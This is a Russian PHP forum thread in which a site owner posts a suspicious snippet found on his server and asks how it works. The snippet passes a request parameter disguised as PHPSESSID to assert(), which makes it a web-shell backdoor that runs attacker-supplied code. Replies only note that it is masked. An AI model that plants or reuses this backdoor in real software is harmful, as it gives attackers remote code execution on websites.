Главная страницаСоздание сайтовБлог Кузнецова М.В.Статьи о PHPPHP-скриптыСтатьи об ApacheФорум С++КонсультацииФорум "Про Жизнь"
Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
PHP. Практика создания Web-сайтов (второе издание). Авторы: Кузнецов М.В., Симдянов И.В. MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ 		Консультационный центр SoftTime

Форум PHP
Вход  Регистрация  Список форумов  Живой форум  Архив  RSS-канал  Правила форума  Участники "Online"  Все участники

Выбрать другой форум

 

Здравствуйте, Посетитель!

 Новая тема

 Поиск

  Список тем

вид форума:
Линейный форум Структурный форум

тема: Вредоносный код, обнаружил у себя.

следующая тема
 
 автор: lgar   (13.05.2012 в 20:53)   письмо автору
  
 


<?
define('PHPSESSID',@assert($_REQUEST['PHPSESSID']))
or phpinfo();
?> 


Интересная вещь, совершенно непонятно, как это чудо работает. Определяем константу PHPSESSID, глушим ошибки (@), assert() проверяет заданное утверждение, $_REQUEST - массив, в котором можно передавать GET/POST-данные. Вопрос только, что берет? Значение в адресной строке браузера куда передает?

Есть такой массив $_REQUEST['PHPSESSID'] или можно было по-любому задать $_REQUEST['Exmpl']?

  Ответить  
 
 автор: cheops   (14.05.2012 в 08:40)   письмо автору
  
   для: lgar   (13.05.2012 в 20:53)
 

Ммм... а вредоносный код где?

  Ответить  
 
 автор: confirm   (14.05.2012 в 09:12)   письмо автору
  
   для: cheops   (14.05.2012 в 08:40)
 

Замаскирован )

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования